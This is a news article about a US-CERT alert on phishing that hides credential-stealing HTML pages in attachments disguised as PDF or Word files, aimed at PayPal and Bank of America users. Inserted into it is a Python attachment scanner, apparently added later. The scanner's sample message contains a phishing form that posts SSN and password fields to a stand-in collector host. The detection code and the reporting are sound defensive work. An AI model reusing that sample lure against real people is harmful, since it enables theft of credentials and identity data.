Phishing Scheme Targets PayPal, BofA

Low-Tech Scam Uses Attachments to Fool Spam Filters
The United States Computer Emergency Readiness Team, part of the Department of Homeland Security, has issued a notice about ongoing phishing attacks targeting PayPal, Bank of America, Lloyds and TSB users.

The attacks get past spam filters using HTML webpage attachments, rather than traditional phishing e-mails that contain malicious links. "Many browsers utilize anti-phishing filters to help protect users against phishing attacks," US-CERT states. "This method of attack is able to bypass this security mechanism."

US-CERT encourages users and administrators to:

  • Not follow unsolicited links or attachments in e-mail;
  • Use caution when providing personal information online;
  • Verify the legitimacy of e-mail by contacting the sender directly;
  • Review common best practices for avoiding e-mail scams and socially engineered attacks.

Neil Schwartzman, founder and chief security specialist at Montreal-based CASL Consulting, says this mode of so-called attachment attack has been growing and has hit several large organizations, including FedEx and Canada Post, in the last month. "It's not even a sophisticated scheme," Schwartzman says. "It's almost unsophisticated, but it's clever."

Because the phishy HTML pages are e-mailed to unsuspecting recipients as attachments, spam filters have no overt URLs to scan and trap. "You create an HTML page and mail it as an attachment that's called a Word doc or a PDF, to trick the content filters," he says. "It's a way to circumvent the spam filter. The victim gets the e-mail, opens the attachment and then is sent to a legitimate website, before being routed to a site that's not legit, where, of course, the victim is asked to enter some kind of account information" or personal identifier, like a U.S. Social Security number.

"Obviously, PayPal is worried about the theft of actual PayPal credentials," Schwartzman says. But the way these phishy forms are set up, fraudsters are out to bilk what they can out of any company or consumer. "They're phishing for any kind of information that can lead to money, whether it is a Social Security number, a PayPal account or credit card information."
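A defensive check for the disguised-attachment technique described above, given here as an added example that is not from US-CERT, Schwartzman or this article: it inspects attachment bytes rather than the declared name or type, and reports HTML forms that post to a remote URL. The function name, reason labels and the constructed sample message are assumptions for illustration.

```python
import re
from email import message_from_string

# Constructed sample: an HTML credential form attached under a ".pdf" name.
SAMPLE = """\
From: service@example.invalid
Subject: Account verification
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please complete the attached form.
--b1
Content-Type: application/pdf; name="statement.pdf"
Content-Disposition: attachment; filename="statement.pdf"

<html><body><form action="http://collector.example.invalid/post" method="post">
SSN: <input name="ssn"> Password: <input type="password" name="pw">
</form></body></html>
--b1--
"""

HTML_RE = re.compile(rb"<\s*(html|body|form|script|meta)\b", re.I)
ACTION_RE = re.compile(rb"<\s*form\b[^>]*\baction\s*=\s*[\"']?(https?://[^\s\"'>]+)", re.I)
SECRET_RE = re.compile(rb"type\s*=\s*[\"']?password|\bssn\b|card number", re.I)

def scan_attachments(raw_message):
    """Return one finding per named attachment whose bytes are really HTML."""
    findings = []
    for part in message_from_string(raw_message).walk():
        name = part.get_filename()
        if part.is_multipart() or not name:
            continue                      # only named attachments are of interest
        body = part.get_payload(decode=True) or b""  # undoes base64/quoted-printable
        if not HTML_RE.search(body[:4096]):
            continue                      # content does not look like HTML
        reasons = ["html_attachment"]
        ctype = part.get_content_type()
        if ctype != "text/html" or not name.lower().endswith((".htm", ".html")):
            reasons.append("name_or_type_disguised")  # HTML labelled as .pdf/.doc
        reasons += ["form_posts_to:" + u.decode() for u in ACTION_RE.findall(body)]
        if SECRET_RE.search(body):
            reasons.append("requests_sensitive_data")
        findings.append({"filename": name, "declared": ctype, "reasons": reasons})
    return findings

if __name__ == "__main__":
    print(scan_attachments(SAMPLE))
```

The heuristics are deliberately coarse; in a mail gateway the findings would feed a quarantine or scoring rule rather than block on their own.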

About the Author

Tracy Kitten

Executive Editor, BankInfoSecurity & CUInfoSecurity

A veteran journalist with more than 18 years' experience, Kitten has covered the financial sector for the last 11 years. Before joining Information Security Media Group in 2010, where she now serves as the Executive Editor of BankInfoSecurity and CUInfoSecurity, she covered the financial self-service industry as the senior editor of ATMmarketplace, part of Networld Media. Kitten has been a regular speaker at domestic and international conferences, and was the keynote at ATMIA's U.S. and Canadian conferences in 2009. She has been quoted by, ABC News, and MSN Money.
